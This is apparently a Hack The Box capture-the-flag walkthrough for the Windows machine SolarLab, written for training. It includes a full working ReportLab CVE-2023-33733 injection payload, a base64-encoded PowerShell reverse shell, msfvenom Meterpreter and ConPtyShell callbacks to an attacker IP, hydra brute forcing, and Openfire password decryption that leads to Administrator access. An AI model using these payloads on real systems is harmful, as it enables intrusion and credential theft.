Hack The Box / WINDOWS / 2024-05-18
Hack The Box - SolarLab (Windows)
Anonymous SMB document leak exposes credentials, ReportLab PDF injection gives code execution, then credential pivoting through app/Openfire data leads to Administrator shell.
Target
- IP:
10.129.179.69
Recon
sudo nmap -sC -sV 10.129.179.69 -p- -v
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-14T19:30:04
|_ start_date: N/A
Add to /etc/hosts:
solarlab.htbreport.solarlab.htb
SMB Enumeration
smbclient -N -L //10.129.179.69/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Mount share:
mkdir mount
sudo mount -t cifs //10.129.179.69/Documents ./mount -o username=hello,password=
tree
.
├── concepts
│ ├── Training-Request-Form.docx
│ └── Travel-Request-Sample.docx
├── desktop.ini
├── details-file.xlsx
├── My Music
├── My Pictures
├── My Videos
└── old_leave_request_form.docx
In details-file.xlsx, credentials are present:
Password File Unnamed: 1 Unnamed: 2 Unnamed: 3 Unnamed: 4 Unnamed: 5 Unnamed: 6 Unnamed: 7
0 NaN NaN NaN NaN NaN NaN NaN NaN
1 Alexander's SSN NaN 123-23-5424 NaN NaN NaN NaN NaN
2 Claudia's SSN NaN 820-378-3984 NaN NaN NaN NaN NaN
3 Blake's SSN NaN 739-1846-436 NaN NaN NaN NaN NaN
4 NaN NaN NaN NaN NaN NaN NaN NaN
5 Site Account# Username Password Security Question Answer Email Other information
6 Amazon.com 101-333 Alexander.knight@gmail.com al;ksdhfewoiuh What was your mother's maiden name? Blue Alexander.knight@gmail.com NaN
7 Pefcu A233J KAlexander dkjafblkjadsfgl What was your high school mascot Pine Tree Alexander.knight@gmail.com NaN
8 Chase NaN Alexander.knight@gmail.com d398sadsknr390 What was the name of your first pet? corvette Claudia.springer@gmail.com NaN
9 Fidelity NaN blake.byte ThisCanB3typedeasily1@ What was your mother's maiden name? Helena blake@purdue.edu NaN
10 Signa NaN AlexanderK danenacia9234n What was your mother's maiden name? Poppyseed muffins Alexander.knight@gmail.com account number: 1925-47218-30
11 NaN NaN ClaudiaS dadsfawe9dafkn What was your mother's maiden name? yellow crayon Claudia.springer@gmail.com account number: 3872-03498-45
12 Comcast JHG3434 NaN NaN NaN NaN NaN NaN
13 Vectren YUIO576 NaN NaN NaN NaN NaN NaN
14 Verizon 1111-5555-33 NaN NaN NaN NaN NaN NaN
Save users in users.txt and passwords in passwords.txt.
Web Login Brute Force
Browse http://report.solarlab.htb:6791/ (login form).
Testing discovered credentials reveals valid users AlexanderK and ClaudiaS.
Add BlakeB to users.txt, then run:
hydra -L users.txt -P passwords.txt report.solarlab.htb http-post-form -s 6791 "/login:username=^USER^&password=^PASS^:F=error|not found"
[6791][http-post-form] host: report.solarlab.htb login: BlakeB password: ThisCanB3typedeasily1@
Log in with discovered credentials.
Initial Access via ReportLab Injection
A PDF is generated from form input. PDF properties show:
Producer: ReportLab PDF Library - www.reportlab.com
Exploit reference:
https://github.com/c53elyas/CVE-2023-33733
Start HTTP server:
python3 -m http.server 80
Create a PDF request, intercept with Burp, and set leave_request to:
<para>
<font color="[ [ getattr(pow,Word('__globals__'))['os'].system('curl http://10.10.16.13') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
exploit
</font>
</para>
Submit request.
We get a callback on our HTTP server.
Generate a PowerShell 3 Base64 reverse shell (revshells.com) and replace payload with:
system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQAzACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==')
Start listener:
nc -vlnp 4444
Send request.
Result:
Reverse shell as solarlab\blake.
Pivot to openfire User
Generate Meterpreter payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe
Upload to victim, start exploit/multi/handler in msfconsole, and execute reverse.exe.
We get a Meterpreter session.
Download application DB:
cd C:\Users\blake\Documents\app\instance
download users.db
sqlite3 users.db
select * from user;
1|blakeb|ThisCanB3typedeasily1@
2|claudias|007poiuytrewq
3|alexanderk|HotP!fireguard
Upload RunasCs:
https://github.com/antonioCoco/RunasCs
.\RunasCs.exe 'openfire' 'HotP!fireguard' "whoami"
solarlab\openfire
Copy ConPtyShell and grant permissions:
icacls "C:\Users\Public\Downloads\ConPtyShell.exe" /grant openfire:F
Start attacker listener:
stty raw -echo; (stty size; cat) | nc -lvnp 4444
Run shell as openfire:
.\RunasCs.exe 'openfire' 'HotP!fireguard' "C:\Users\Public\Downloads\ConPtyShell.exe 10.10.16.13 4444"
We get a reverse shell as openfire.
Administrator Access via Openfire Secrets
cd C:\Program Files\Openfire\embedded-db
type openfire.script
CREATE MEMORY TABLE PUBLIC.OFUSER(USERNAME VARCHAR(64) NOT NULL,STOREDKEY VARCHAR(32),SERVERKEY VARCHAR(32),SALT VARCH
AR(32),ITERATIONS INTEGER,PLAINPASSWORD VARCHAR(32),ENCRYPTEDPASSWORD VARCHAR(255),NAME VARCHAR(100),EMAIL VARCHAR(100
),CREATIONDATE VARCHAR(15) NOT NULL,MODIFICATIONDATE VARCHAR(15) NOT NULL,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME))
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb
28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b
365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
Tool to decrypt Openfire passwords:
https://github.com/shakaw/openfire-password-decrypt.git
sudo apt install php-mcrypt
php -a
Define decrypt_openfirepass, change return $plaintext; to echo $plaintext, then run:
decrypt_openfirepass("becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442", "hGXiFzsKaAeYLjn");
ThisPasswordShouldDo!@
Run as Administrator:
.\RunasCs.exe 'Administrator' 'ThisPasswordShouldDo!@' "whoami"
solarlab\administrator
Start listener:
stty raw -echo; (stty size; cat) | nc -lvnp 4444
Spawn final shell:
.\RunasCs.exe 'Administrator' 'ThisPasswordShouldDo!@' "C:\Users\Public\Downloads\ConPtyShell.exe 10.10.16.13 4444"
We get a reverse shell as Administrator.